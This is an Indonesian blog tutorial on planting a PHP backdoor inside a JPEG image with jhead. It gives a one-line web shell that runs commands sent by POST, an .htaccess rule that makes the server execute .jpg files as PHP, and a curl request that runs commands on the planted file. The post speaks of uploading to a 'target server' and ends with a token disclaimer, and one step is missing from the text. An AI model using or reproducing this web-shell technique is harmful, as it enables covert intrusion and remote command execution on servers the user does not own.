Sabtu, 09 Juni 2018

Menyisipkan Backdoor PHP ke Dalam Gambar

Hallo friend..
W bakal share tutor lama sih, yah mungkin buat para mastah udah basi kali, mastah minggir dulu, sorry ni stah wkwkwk.

Kita bakal belajar steganografi, yaitu suatu teknik menyisipkan pesan rahasia kedalam sebuah gambar. Kita akan melakukannya dengan bantuan tool jhead.
Ok Langsung

Pertama Install dulu eaaa wkwk

 #apt install jhead

Kemudian siapkan gambar yg mau disisipi backdoor, untuk memastikan backdoor bersih dari sisipan backdoor sebelumnya maka kita wajib bersihin dulu

 #jhead -pure gambarlu.jpg


Okeh itu tandanya udah clear gak ada script yg disisipin
Next, giliran kita yg isigambarnya dengan backdoor wkwk
ketikan perintah berikut


Nah, kalian akan masuk ke vi editor, ketik tombol insert masukan code dibawah, ketik tombol esc, ketik :wq enter.

    <?php passthru($_POST['cmd']); __halt_compiler();


Code diatas merupakan fungsi php passthru yg berfungsi untuk mengeksekusi program lain, disini w pake buat eksekusi terminal atau cmd.
Selanjutnyatinggal kita cek apakah script sudah masuk ke gmbar atau belum

 #jhead gambarlu.jpg



Ok, kalo dah masuk tinggal upload dah ke server target, btw w pake localhost. SO! gak ngelanggar hukum wkwkwk.
Jangan lupa upload juga .htaccess yg isinya code berikut.  

 AddType application/x-httpd-php .jpg


file ini berfungsi agar server mengerti bahwa code yg ada di gambar adalah code php maka akan di eksekusi sebagai kode php.
Selanjutnya tinggal eksekusi deh,ketikan perintah berikut

 #curl -d cmd="uname -r; uname -a; id; ls;" http://localhost/ gambarlu.jpg --output hasil.txt  


Tinggal buka dah file outputnya,

 #cat fileoutput.txt


Oke dah selanjutnya eksplore sendiri wkwkw
Thx

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami
  


 
Share this article on :

1 komentar:

  1. simulasi ini ditunjukan ketika web sudah di bypass dan ingin menanamkan backdoor.

    BalasHapus